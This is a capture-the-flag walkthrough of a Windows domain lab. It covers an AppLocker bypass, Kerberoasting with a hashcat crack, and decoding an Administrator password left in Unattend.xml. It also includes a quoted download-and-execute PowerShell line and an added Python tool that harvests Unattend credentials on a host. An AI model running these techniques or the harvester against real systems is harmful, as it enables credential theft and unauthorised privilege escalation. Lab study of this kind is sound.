Corp

Task 1 - Deploy the Windows machine

No need to answer!

Task 2 - Bypassing Applocker

Use PowerShell to download an executable of your choice onto the box, place it in the whitelisted directory and execute it. AppLocker's default executable rule allows everything under the Windows folder, and the printer colour-profile directory below is one of the few places under it that a standard user can write to, so anything dropped there runs:

cd C:\Windows\System32\spool\drivers\color 

Just like bash with .bash_history, PowerShell (through the PSReadLine module) saves previous commands to a file called ConsoleHost_history.txt, located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. Read that file and obtain the flag.

PS C:\Windows\System32\spool\drivers\color> gc C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
ls
dir
Get-Content test
flag{a12a41b5f8111327690f836e9b302f0b}
iex(new-object net.webclient).DownloadString('http://127.0.0.1/test.ps1'

Task 3 - Kerberoasting

Let's first enumerate the domain. Running setspn -T medin -Q */* lists every SPN registered in the queried domain. An SPN (Service Principal Name) is the mapping between a service and the account it runs under, and any user account with an SPN is a Kerberoasting target. Running that command, we find an existing SPN. Which user is it registered to?

Now that we have found a user account with an SPN, we can use Invoke-Kerberoast to request a service ticket for it. Any domain user may request that ticket, and with RC4 (etype 23) its encrypted part is protected only by the service account's NT hash, so the ticket can be taken offline and cracked.

Let's use hashcat to brute-force this password. The hash type is Kerberos 5 TGS-REP etype 23, which is hashcat mode 13100. Crack the hash. What is the user's password in plain text?

To crack the hash with hashcat and the rockyou wordlist (--force only suppresses hashcat's warnings about the OpenCL runtime; leave it out unless hashcat refuses to start without it):

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

Log in as this user. What is their flag?

Task 4 - Privilege Escalation

Unattended installs can leave their answer file behind, and the one on this box holds an AutoLogon entry for Administrator. PlainText is false, but the value is only base64-encoded, not encrypted. What is the decoded password?

c:\Users\fela.CORP>type C:\Windows\Panther\Unattend\Unattended.xml
<AutoLogon>
    <Password>
        <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
        <PlainText>false</PlainText>
    </Password>
    <Enabled>true</Enabled>
    <Username>Administrator</Username>
</AutoLogon>
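A parser for the file format above, as an added example that is not part of the original write-up: it walks an Unattend.xml, copes with the urn:schemas-microsoft-com:unattend namespace that real files carry, and reverses the obfuscation behind PlainText=false values. Two encodings occur in the wild: files written by Windows SIM hold base64(UTF-16LE(password + element name)), that is a literal Password (for AutoLogon) or AdministratorPassword suffix that must be stripped, while hand-edited files like this one hold plain base64 of the password itself. The sample XML embeds the AutoLogon block shown on the page plus a constructed SIM-style AdministratorPassword; the path list is the usual set of leftover locations to check on a box, and the heuristic for telling UTF-16LE from plain bytes assumes an ASCII password.

```python
# Unattend.xml credential extraction; example code added to this write-up. The AutoLogon
# value is the one from the page, the AdministratorPassword sample is constructed.
import base64
import xml.etree.ElementTree as ET
from pathlib import Path

# Usual leftovers of an unattended install; check each of these on a box.
UNATTEND_PATHS = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattended.xml",
    r"C:\Windows\System32\Sysprep\Sysprep.xml",
    r"C:\Windows\System32\Sysprep\Panther\Unattend.xml",
    r"C:\Unattend.xml",
]

def _local(tag: str) -> str:
    """Drop the urn:schemas-microsoft-com:unattend namespace that real files carry."""
    return tag.rsplit("}", 1)[-1]

def _child(node, name):
    return next((c for c in node if _local(c.tag) == name), None)

def _text(node, name):
    c = _child(node, name)
    return c.text.strip() if c is not None and c.text else None

def decode_unattend_password(value: str, element: str) -> str:
    """Reverse the obfuscation behind <PlainText>false</PlainText>.

    Windows SIM writes base64(UTF-16LE(password + element name)), so a literal
    "Password" (AutoLogon) or "AdministratorPassword" suffix has to be stripped.
    Hand-edited files, like the one on this page, hold plain base64 of the password.
    UTF-16LE of ASCII text is recognised by every odd byte being zero (assumption)."""
    raw = base64.b64decode(value)
    if len(raw) % 2 == 0 and raw[1::2] == bytes(len(raw) // 2):
        text = raw.decode("utf-16le")
        return text[: -len(element)] if text.endswith(element) else text
    return raw.decode("utf-8")

def find_credentials(xml_text: str):
    """Return (element, username, password) for AutoLogon and AdministratorPassword."""
    found = []
    for node in ET.fromstring(xml_text).iter():
        name = _local(node.tag)
        if name == "AutoLogon":
            pw_node, user, element = _child(node, "Password"), _text(node, "Username"), "Password"
        elif name == "AdministratorPassword":
            pw_node, user, element = node, "Administrator", name
        else:
            continue
        if pw_node is None or _text(pw_node, "Value") is None:
            continue
        value = _text(pw_node, "Value")
        if (_text(pw_node, "PlainText") or "true").lower() != "true":
            value = decode_unattend_password(value, element)
        found.append((element, user, value))
    return found

def scan_host(paths=UNATTEND_PATHS):
    """On the target: parse whichever of the usual files exist."""
    hits = []
    for p in paths:
        if Path(p).is_file():
            hits.extend(find_credentials(Path(p).read_text(encoding="utf-8-sig")))
    return hits

def sim_encode(password: str, element: str) -> str:
    """How Windows SIM hides a value; used only to build the constructed sample."""
    return base64.b64encode((password + element).encode("utf-16le")).decode()

SAMPLE_XML = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{sim_encode('L0calAdm1n!', 'AdministratorPassword')}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

if __name__ == "__main__":
    for element, user, password in find_credentials(SAMPLE_XML):
        print(f"{element}: {user} / {password}")
```

Running it on the sample prints the Administrator AutoLogon password from the page and L0calAdm1n! for the constructed SIM-style entry; on a real box, scan_host() does the same over the leftover files, which is the whole privilege-escalation step in one call.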

Now that we have the Administrator's password, log in as them and obtain the last flag.
